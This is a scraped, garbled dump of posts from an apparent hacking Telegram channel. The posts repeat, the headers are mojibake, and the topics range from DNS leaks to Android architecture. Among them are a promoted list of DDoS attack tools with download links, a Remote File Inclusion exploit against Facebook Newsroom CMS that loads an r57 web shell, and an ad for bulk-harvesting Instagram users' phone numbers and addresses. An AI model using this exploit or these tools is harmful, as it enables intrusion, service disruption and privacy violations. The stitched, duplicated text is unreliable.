β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a DNS leak and why it mattersπ¨βοΈ ?
1) When using an anonymity or privacy service, it is extremely important that all traffic originating from your computer is routed through the anonymity network.
2) If any traffic flows outside of a secure connection to the network, any adversary controlling your traffic will be able to register your activity.
3) DNS or Domain Name System is used to translate domain names such as www.privacyinternational.org into numeric IP addresses, for example. 123.123.123.123, which are required to route data packets on the Internet.
4) Whenever your computer needs to contact a server on the Internet, for example when you enter a URL in your browser, your computer contacts the DNS server and asks for an IP address.
5) Most ISPs assign their customers a DNS server that they control and use to log and record your online activities.
6) Under certain conditions, even when connected to the anonymity network, the operating system will continue to use its default DNS servers instead of the anonymous DNS servers assigned to your computer over the anonymity network.
7) DNS leaks pose a serious privacy threat because an anonymous network can provide a false sense of security while personal data is leaked.
8) If you are concerned about a DNS leak, you must also understand DNS transparent proxy technology to ensure that the solution you choose preserves your privacy.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a DNS leak and why it mattersπ¨βοΈ ?
1) When using an anonymity or privacy service, it is extremely important that all traffic originating from your computer is routed through the anonymity network.
2) If any traffic flows outside of a secure connection to the network, any adversary controlling your traffic will be able to register your activity.
3) DNS or Domain Name System is used to translate domain names such as www.privacyinternational.org into numeric IP addresses, for example. 123.123.123.123, which are required to route data packets on the Internet.
4) Whenever your computer needs to contact a server on the Internet, for example when you enter a URL in your browser, your computer contacts the DNS server and asks for an IP address.
5) Most ISPs assign their customers a DNS server that they control and use to log and record your online activities.
6) Under certain conditions, even when connected to the anonymity network, the operating system will continue to use its default DNS servers instead of the anonymous DNS servers assigned to your computer over the anonymity network.
7) DNS leaks pose a serious privacy threat because an anonymous network can provide a false sense of security while personal data is leaked.
8) If you are concerned about a DNS leak, you must also understand DNS transparent proxy technology to ensure that the solution you choose preserves your privacy.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Variations and Symptoms of the WordPress Redirect Hack :
1) Classic Redirection Hack
The hacked redirect has been around since the longest time. Every time someone visits your website, they're redirected to questionable links like pharma sites, adult websites etc.
2) Redirection via Search Results
When website is opened by entering the URL in the browser, it opens fine. But when opened by searching on Google, it redirects to malicious websites.
3) Device Specific WordPress Redirection
The website only redirects when opened from mobile device or only redirects when opened from desktop depending on what type of malware is present.
4) Push Notifications Hack
We've seen this one since last few months where hackers also show browser push notifications to your visitors. Usually these push notifications point to porn websites.
5) Geography Specific Redirection
In some cases, some visitors of yours might see a redirection and some might not. This could be because hackers program the malware to work only for certain geographies. Where exactly the malware redirects also can be tailored geography-wise by hackers.
some wiki source
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Variations and Symptoms of the WordPress Redirect Hack :
1) Classic Redirection Hack
The hacked redirect has been around since the longest time. Every time someone visits your website, they're redirected to questionable links like pharma sites, adult websites etc.
2) Redirection via Search Results
When website is opened by entering the URL in the browser, it opens fine. But when opened by searching on Google, it redirects to malicious websites.
3) Device Specific WordPress Redirection
The website only redirects when opened from mobile device or only redirects when opened from desktop depending on what type of malware is present.
4) Push Notifications Hack
We've seen this one since last few months where hackers also show browser push notifications to your visitors. Usually these push notifications point to porn websites.
5) Geography Specific Redirection
In some cases, some visitors of yours might see a redirection and some might not. This could be because hackers program the malware to work only for certain geographies. Where exactly the malware redirects also can be tailored geography-wise by hackers.
some wiki source
β β β Uππ»βΊπ«Δπ¬πβ β β β
Grow a Profitable Affiliate Website with Long Tail Keywords That Ranks in Google. Learn from people with experience, and build a successful online businessβ¦
https://mega.nz/folder/RYxmyIDS#dG6ASQ2bFuqbYMncFrtuZg
https://mega.nz/folder/RYxmyIDS#dG6ASQ2bFuqbYMncFrtuZg
mega.nz
6.67 GB folder on MEGA
146 files and 17 subfolders
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST DDOS ATTACK TOOLS IN 2020 :
https://www.solarwinds.com/security-event-manager/use-cases/ddos-attack?a_aid=BIZ-TXT-GURU99
https://sourceforge.net/projects/loic/
https://sourceforge.net/projects/highorbitioncannon/
https://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html
https://sourceforge.net/projects/ddosim/
https://github.com/Ha3MrX/DDos-Attack
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST DDOS ATTACK TOOLS IN 2020 :
https://www.solarwinds.com/security-event-manager/use-cases/ddos-attack?a_aid=BIZ-TXT-GURU99
https://sourceforge.net/projects/loic/
https://sourceforge.net/projects/highorbitioncannon/
https://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html
https://sourceforge.net/projects/ddosim/
https://github.com/Ha3MrX/DDos-Attack
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Solarwinds
How to Stop a DDoS Attack - Detection & Mitigation Tool | SolarWinds
IT monitoring and management tools built for SysAdmins and network engineers. Powerful, affordable solutions for DDoS attack detection. Free trial!
Forwarded from UNDERCODE NEWS
Microsoft removes 18 Azure Active Directory apps after being abused by Chinese hackers
#CyberAttacks
_
#CyberAttacks
_
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to determine when the Linux operating system was booted ? #ForAdvanced
1) There is a simple solution, because we can directly use the / proc filesystem.
Use the / proc / stat file which contains kernel / system statistics.
$ cat / proc / stat
cpu 13014200 24406 4799169 40794104 34102 0 96456 0 0 0
cpu0 3273277 5052 1208241 30257443 16180 0 30562 0 0 0
cpu1 3258376 6672 1187026 3510180 8958 0 25642 0 0 0
cpu2 3266882 6158 1193469 3501113 4998 0 29868 0 0 0
cpu3 3215665 6523 1210432 3525367 3964 0 10383 0 0 0
intr 539439101 9 389 0 0 0 0 0 15646 1 2595538 0 0 15 0 0 0 0 0 0 0 0 347 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 253 0 0 0 0 1483731 313 4800809 44745763 0 7901501 18 629 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ctxt 2042251595
btime 1578304868
processes 196905
procs_running 1
procs_blocked 0
softirq 310354343 39361834 94774221 414 442124 4311767 39 489577 97929159 0 73045208
2) Let's calculate the btime value, which contains the loading time in seconds since the start.
$ awk '/ btime / {print $ 2}' / proc / stat
1578304868
3) Convert seconds from start to date using awk, xargs and date.
$ awk '/ btime / {print $ 2}' / proc / stat | xargs -IUNIX_TIMESTAMP date --date @UNIX_TIMESTAMP
Mon Jan 6 11:01:08 CET 2020
4) Convert seconds elapsed from start to date using awk and date.
$ awk '/ btime / {command = "date --date @" $ 2; system (command)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
5) Convert seconds to date using only awk.
$ awk '/ btime / {print strftime ("% a% b% e% H:% M:% S% Z% Y", $ 2)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to determine when the Linux operating system was booted ? #ForAdvanced
1) There is a simple solution, because we can directly use the / proc filesystem.
Use the / proc / stat file which contains kernel / system statistics.
$ cat / proc / stat
cpu 13014200 24406 4799169 40794104 34102 0 96456 0 0 0
cpu0 3273277 5052 1208241 30257443 16180 0 30562 0 0 0
cpu1 3258376 6672 1187026 3510180 8958 0 25642 0 0 0
cpu2 3266882 6158 1193469 3501113 4998 0 29868 0 0 0
cpu3 3215665 6523 1210432 3525367 3964 0 10383 0 0 0
intr 539439101 9 389 0 0 0 0 0 15646 1 2595538 0 0 15 0 0 0 0 0 0 0 0 347 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 253 0 0 0 0 1483731 313 4800809 44745763 0 7901501 18 629 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ctxt 2042251595
btime 1578304868
processes 196905
procs_running 1
procs_blocked 0
softirq 310354343 39361834 94774221 414 442124 4311767 39 489577 97929159 0 73045208
2) Let's calculate the btime value, which contains the loading time in seconds since the start.
$ awk '/ btime / {print $ 2}' / proc / stat
1578304868
3) Convert seconds from start to date using awk, xargs and date.
$ awk '/ btime / {print $ 2}' / proc / stat | xargs -IUNIX_TIMESTAMP date --date @UNIX_TIMESTAMP
Mon Jan 6 11:01:08 CET 2020
4) Convert seconds elapsed from start to date using awk and date.
$ awk '/ btime / {command = "date --date @" $ 2; system (command)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
5) Convert seconds to date using only awk.
$ awk '/ btime / {print strftime ("% a% b% e% H:% M:% S% Z% Y", $ 2)}' / proc / stat
Mon Jan 6 11:01:08 CET 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦For beginers by undercode What is the principle of DDoS attack? Introduction to the principle of DDoS attack and protective measures
1) Definition of DDoS
The predecessor of DDos, the DoS (DenialofService) attack, means a denial of service attack. This attack behavior makes the website server flooded with a large amount of information requesting a reply, consumes network bandwidth or system resources, and causes the network or system to be overloaded and stop providing normal network service.
The DDoS distributed denial of service mainly uses the vulnerabilities of existing machines and systems on the Internet to capture a large number of networked hosts and make them a proxy for attackers.
When the number of controlled machines reaches a certain number, the attacker sends instructions to manipulate these attacking machines to launch DoS attacks on the target host or network at the same time, which consumes a large amount of its network belt and system resources, causing the network or system to be paralyzed or stop providing normal networks service. Due to the distributed nature of DDos, it has far more powerful attack and destructive power than Dos.
2) The principle of DDoS attack
look at picture a relatively complete DDos attack system is divided into four parts, namely the attacker (attacker can also be called master), control puppet machine (handler), attack puppet machine (demon, also called agent) and Victim.
Part 2 and Part 3 are used for control and actual attack. The control machine in the second part only issues orders and does not participate in the actual attack, and the third part attacks the actual DDoS attack package on the puppet machine.
For the second and third part of the computer, the attacker has control or partial control, and uploads the corresponding DDoS program to these platforms. These programs run like normal programs and wait for instructions from the attacker. Usually It also uses various means to hide itself from being discovered by others. In normal times, there is nothing unusual about these puppet machines, but once an attacker connects to them to control and issue instructions, the attacking puppet machine becomes the attacker to launch an attack.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦For beginers by undercode What is the principle of DDoS attack? Introduction to the principle of DDoS attack and protective measures
1) Definition of DDoS
The predecessor of DDos, the DoS (DenialofService) attack, means a denial of service attack. This attack behavior makes the website server flooded with a large amount of information requesting a reply, consumes network bandwidth or system resources, and causes the network or system to be overloaded and stop providing normal network service.
The DDoS distributed denial of service mainly uses the vulnerabilities of existing machines and systems on the Internet to capture a large number of networked hosts and make them a proxy for attackers.
When the number of controlled machines reaches a certain number, the attacker sends instructions to manipulate these attacking machines to launch DoS attacks on the target host or network at the same time, which consumes a large amount of its network belt and system resources, causing the network or system to be paralyzed or stop providing normal networks service. Due to the distributed nature of DDos, it has far more powerful attack and destructive power than Dos.
2) The principle of DDoS attack
look at picture a relatively complete DDos attack system is divided into four parts, namely the attacker (attacker can also be called master), control puppet machine (handler), attack puppet machine (demon, also called agent) and Victim.
Part 2 and Part 3 are used for control and actual attack. The control machine in the second part only issues orders and does not participate in the actual attack, and the third part attacks the actual DDoS attack package on the puppet machine.
For the second and third part of the computer, the attacker has control or partial control, and uploads the corresponding DDoS program to these platforms. These programs run like normal programs and wait for instructions from the attacker. Usually It also uses various means to hide itself from being discovered by others. In normal times, there is nothing unusual about these puppet machines, but once an attacker connects to them to control and issue instructions, the attacking puppet machine becomes the attacker to launch an attack.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE COMMUNITY
medium_com_growmeorganic_how_to_extract_bulk_emails_and_phone_numbers.pdf
2 MB
EXTRACT PHONE NUMBER & EMAIL FROM INSTAGRAM :
What data can you export with GrowMeOrganic?
Instagram Username
Full Name
Phone Number
Website
Bio
Country
City
Zip Code
Address
Followers Count
Following Count
Is Business
Category
Business Potential (Using Instagram AI)
Is Private
Is Verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
medium_com_growmeorganic_how_to_extract_bulk_emails_and_phone_numbers.pdf
GrowMeOrganic
#1 FREE Email Finder & Sales Automation Tool | GrowMeOrganic
Find emails from B2B & B2C businesses | 15M+ verified B2B email database | Google Map Extractor | Automate Sales Navigator | FREE Email Finder
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability :
Discovered by : Ciph3r
# MAIL : Ciph3r_blackhat@yahoo.com
# SP tanx4: Iranian hacker & Kurdish security TEAM
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515
# class : remote
# risk : high
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d
#####################################################
# C0de :
# require_once ($path.'/classes/feedStories.class.php');
EXPLOIT :
www.[Target].com/path/includes/home.php?path=[r57.txt?]
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability :
Discovered by : Ciph3r
# MAIL : Ciph3r_blackhat@yahoo.com
# SP tanx4: Iranian hacker & Kurdish security TEAM
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515
# class : remote
# risk : high
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d
#####################################################
# C0de :
# require_once ($path.'/classes/feedStories.class.php');
EXPLOIT :
www.[Target].com/path/includes/home.php?path=[r57.txt?]
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
sourceforge.net
Newsroom Application for Facebook - Browse Files at SourceForge.net
An open source application for Facebook which can be easily used by non-profits and non-government organizations to quickly install a basic Facebookβ¦
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Overview of Android hierarchical security architecture and core components :
#FastTips
The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security. This article will introduce the Android hierarchical security architecture and its core components in detail.
1) The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security.
Android uses Linux 2.6 as the operating system, Linux 2.6 is a standard technology, and Linux is also an open operating system. Android's use of the operating system includes two parts: the core and the driver. The Linux core of Android is the standard Linux 2.6 kernel. Android needs more drivers related to mobile devices.
π¦The main drivers are as follows:
Display driver (DisplayDriver): commonly used Linux-based frame buffer (Frame Buffer) driver
Flash memory driver (FlashMemory Driver)
Camera driver (CameraDriver): commonly used Linux-based v4l (Video for) driver.
Audio Driver (AudioDriver): commonly used based on ALSA (Advanced Linux Sound Arc..
2) Various libraries (Libraries) and Android runtime environment (RunTime)
This level corresponds to the general embedded system and is equivalent to the middleware level. This level of Android is divided into two parts, one is various libraries, and the other is the Android runtime environment. The content of this layer is mostly implemented in C++. Among them, various libraries include:
C library: The standard library of C language, which is also one of the lowest level libraries in the system.
3) Application Framework (ApplicationFramework)
The Android application framework provides APIs for developers at the application layer. It is actually an application framework. Since the upper-level application is built in JAVA, the first level provided by this level includes the various controls needed in the UI program: for example: Views (view components) include lists (list), grids (grid), textboxes Text box), buttons (buttons), etc., and even an embedded Web browser. An Android application can make use of the following parts in the application framework: Activity, Broadcast IntentReceiver, Service, Content Provider.
4) Application
Android applications are mainly user interface (UserInterface), usually written in JAVA program, which can also contain various resource files (placed in the res directory). After the JAVA program and related resources are compiled, an APK package will be generated. Android itself provides many core applications such as the home screen (Home), contacts (Contact), phone (Phone), browser (Browsers) and so on. At the same time, application developers can also use the API of the application framework layer to implement their own programs.
#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Overview of Android hierarchical security architecture and core components :
#FastTips
The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security. This article will introduce the Android hierarchical security architecture and its core components in detail.
1) The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security.
Android uses Linux 2.6 as the operating system, Linux 2.6 is a standard technology, and Linux is also an open operating system. Android's use of the operating system includes two parts: the core and the driver. The Linux core of Android is the standard Linux 2.6 kernel. Android needs more drivers related to mobile devices.
π¦The main drivers are as follows:
Display driver (DisplayDriver): commonly used Linux-based frame buffer (Frame Buffer) driver
Flash memory driver (FlashMemory Driver)
Camera driver (CameraDriver): commonly used Linux-based v4l (Video for) driver.
Audio Driver (AudioDriver): commonly used based on ALSA (Advanced Linux Sound Arc..
2) Various libraries (Libraries) and Android runtime environment (RunTime)
This level corresponds to the general embedded system and is equivalent to the middleware level. This level of Android is divided into two parts, one is various libraries, and the other is the Android runtime environment. The content of this layer is mostly implemented in C++. Among them, various libraries include:
C library: The standard library of C language, which is also one of the lowest level libraries in the system.
3) Application Framework (ApplicationFramework)
The Android application framework provides APIs for developers at the application layer. It is actually an application framework. Since the upper-level application is built in JAVA, the first level provided by this level includes the various controls needed in the UI program: for example: Views (view components) include lists (list), grids (grid), textboxes Text box), buttons (buttons), etc., and even an embedded Web browser. An Android application can make use of the following parts in the application framework: Activity, Broadcast IntentReceiver, Service, Content Provider.
4) Application
Android applications are mainly user interface (UserInterface), usually written in JAVA program, which can also contain various resource files (placed in the res directory). After the JAVA program and related resources are compiled, an APK package will be generated. Android itself provides many core applications such as the home screen (Home), contacts (Contact), phone (Phone), browser (Browsers) and so on. At the same time, application developers can also use the API of the application framework layer to implement their own programs.
#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β